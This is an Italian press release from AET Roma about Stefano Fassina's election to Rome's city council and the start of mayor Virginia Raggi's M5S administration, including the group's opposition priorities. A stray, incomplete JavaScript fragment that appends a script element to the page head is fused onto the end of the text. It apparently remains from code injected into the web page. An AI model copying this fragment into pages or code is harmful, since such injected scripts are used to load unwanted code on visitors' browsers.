raggiprimaassembleacapitolina1

“LA SINISTRA TORNA IN AULA GIULIO CESARE. ATTENDIAMO IL M5S ALLA PROVA DI GOVERNO”

La sinistra torna in aula Giulio Cesare. E lo fa grazie a “Sinistra per Roma” che ha portato all’elezione di Stefano Fassina a consigliere Comunale. Un obiettivo raggiunto anche grazie al contributo fondamentale dell’Altra Europa con Tsipras che per prima ha creduto nel progetto.

Un traguardo importante che è maturato dopo mesi di duro lavoro e un programma chiaro e in netta discontinuità con il passato e le ultime amministrazioni, nonostante una campagna elettorale difficile, corta e che non ha premiato a pieno gli sforzi profusi da militanti, candidati e sostenitori di una sinistra unita.

Oggi però è anche il debutto ufficiale del Movimento 5 Stelle a Roma, con la prima donna sindaco della Capitale, Virginia Raggi. “Alla neo sindaca non può che andare il nostro augurio di buon lavoro – sottolinea il portavoce di AET Roma, Ferruccio Nobili – nel difficile compito di invertire la rotta e risollevare la città. Nonostante le molte diversità che ci distinguono dal M5S, ci auguriamo, per il bene di Roma, che possano essere interrotti quei legami e quei rapporti di forza che hanno fino ad oggi imperversato sulla città”.

In consiglio comunale faremo opposizione su tutti i punti che si discostano dal nostro programma, ma saremo allo stesso tempo da pungolo e da stimolo, nei confronti della giunta, con proposte e iniziative. Di sicuro – continua Nobili – ci batteremo, insieme al nostro capogruppo Stefano Fassina, sui temi che abbiamo portato avanti in campagna elettorale. Ricontrattazione del debito, stop allo stadio della Roma, referendum sulle Olimpiadi, utilizzo sociale del patrimonio pubblico, tutela e valorizzazione dei dipendenti pubblici, lotta all’ingiustizia sociale sono alcuni dei punti del nostro programma su cui il M5S e la sindaca Raggi troveranno sempre la nostra collaborazione”.

“Oggi è stata anche la presentazione ufficiale della giunta capitolina, alla quale si è arrivati al termine di un percorso che, soprattutto in base a quanto emerso da indiscrezioni di stampa, non è stato privo di ostacoli. Al momento – conclude Nobili – permangono nella formazione della squadra di governo luci e ombre. Attendiamo la sindaca Raggi e la sua giunta alla prova di governo, per capire cosa realmente sapranno fare per la città e se manterranno quel profilo di cambiamento e discontinuità promesso in campagna elettorale“.d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) {

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>